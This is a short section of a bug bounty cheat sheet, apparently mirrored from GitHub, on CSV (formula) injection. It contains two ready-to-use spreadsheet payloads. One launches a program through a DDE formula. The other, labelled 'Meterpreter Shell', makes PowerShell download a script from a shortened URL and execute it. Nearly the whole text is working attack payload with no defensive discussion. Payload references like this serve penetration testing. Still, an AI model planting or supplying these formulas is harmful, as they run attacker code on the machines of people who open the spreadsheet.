mirror of
https://github.com/EdOverflow/bugbounty-cheatsheet.git
synced 2024-11-22 19:13:20 +00:00
13 lines
No EOL
155 B
Markdown
13 lines
No EOL
155 B
Markdown
## CSV Injection
|
|
|
|
**Newline character**
|
|
|
|
```
|
|
%0A-3+3+cmd|' /C calc'!D2
|
|
```
|
|
|
|
**Meterpreter Shell**
|
|
|
|
```
|
|
=cmd|'/C powershell IEX(wget bit.ly/1X146m3)'!A0
|
|
``` |